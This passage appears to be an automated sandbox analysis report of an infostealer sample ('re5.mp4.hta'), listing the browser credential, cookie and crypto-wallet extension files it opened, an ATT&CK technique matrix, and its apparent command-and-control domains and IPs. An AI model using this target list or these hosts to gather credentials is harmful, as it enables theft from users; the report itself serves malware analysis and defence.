                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3836, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  111
                  Process Injection
                  1
                  Masquerading
                  2
                  OS Credential Dumping
                  221
                  Security Software Discovery
                  Remote Services1
                  Email Collection
                  21
                  Encrypted Channel
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Command and Scripting Interpreter
                  Boot or Logon Initialization Scripts1
                  DLL Side-Loading
                  221
                  Virtualization/Sandbox Evasion
                  LSASS Memory1
                  Process Discovery
                  Remote Desktop Protocol1
                  Archive Collected Data
                  1
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts3
                  PowerShell
                  Logon Script (Windows)Logon Script (Windows)111
                  Process Injection
                  Security Account Manager221
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin Shares41
                  Data from Local System
                  3
                  Non-Application Layer Protocol
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                  Deobfuscate/Decode Files or Information
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object Model2
                  Clipboard Data
                  114
                  Application Layer Protocol
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                  Obfuscated Files or Information
                  LSA Secrets12
                  File and Directory Discovery
                  SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Software Packing
                  Cached Domain Credentials33
                  System Information Discovery
                  VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  DLL Side-Loading
                  DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582681 Sample: re5.mp4.hta Startdate: 31/12/2024 Architecture: WINDOWS Score: 100 36 t1.awagama2.org 2->36 38 permissiblene.click 2->38 40 klipvumisui.shop 2->40 48 Suricata IDS alerts for network traffic 2->48 50 Found malware configuration 2->50 52 Malicious sample detected (through community Yara rule) 2->52 54 13 other signatures 2->54 11 mshta.exe 1 2->11         started        signatures3 process4 signatures5 64 Suspicious powershell command line found 11->64 14 powershell.exe 18 11->14         started        process6 signatures7 68 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 14->68 70 Found many strings related to Crypto-Wallets (likely being stolen) 14->70 72 Bypasses PowerShell execution policy 14->72 74 Found suspicious powershell code related to unpacking or dynamic code loading 14->74 17 powershell.exe 15 16 14->17         started        21 conhost.exe 14->21         started        process8 dnsIp9 34 t1.awagama2.org 188.114.97.3, 443, 49707 CLOUDFLARENETUS European Union 17->34 46 Injects a PE file into a foreign processes 17->46 23 powershell.exe 17->23         started        27 conhost.exe 17->27         started        signatures10 process11 dnsIp12 42 permissiblene.click 188.114.96.3, 443, 49983, 49984 CLOUDFLARENETUS European Union 23->42 44 klipvumisui.shop 104.21.37.128, 443, 49993 CLOUDFLARENETUS United States 23->44 56 Query firmware table information (likely to detect VMs) 23->56 58 Found many strings related to Crypto-Wallets (likely being stolen) 23->58 60 Tries to harvest and steal ftp login credentials 23->60 62 2 other signatures 23->62 29 powershell.exe 21 23->29         started        signatures13 process14 signatures15 66 Loading BitLocker PowerShell Module 29->66 32 conhost.exe 29->32         started        process16

